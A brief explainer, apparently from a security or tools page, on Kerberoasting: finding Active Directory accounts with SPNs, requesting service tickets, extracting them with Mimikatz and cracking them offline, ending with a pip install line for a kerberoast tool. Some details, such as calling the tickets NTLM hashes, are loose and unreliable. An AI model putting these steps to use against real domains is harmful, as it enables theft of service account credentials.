Kerberoasting is an attack method that allows an attacker to hack Active Directory service account passwords offline without fear of being detected.
How it works kerberoast
- An attacker scans the Active Directory directory service for user accounts with specified SPN values, using any of the methods, including PowerShell and LDAP queries, scripts provided by the toolbox Kerberoast or tools like PowerSploit
- Once a list of target accounts has been received, the attacker requests access to the service from AD using the SPN values
- Using Mimikatz, the attacker extracts the service requests to memory and stores the information in a file
- Once the credentials are saved to disk, the attacker passes them to a password-breaking script that will run a password dictionary as the NTLM hashes with the exported service requests until the request can be successfully opened. When the request is finally opened, it will be presented to the attacker in clear text.
pip3 install kerberoast
You can download the application from here.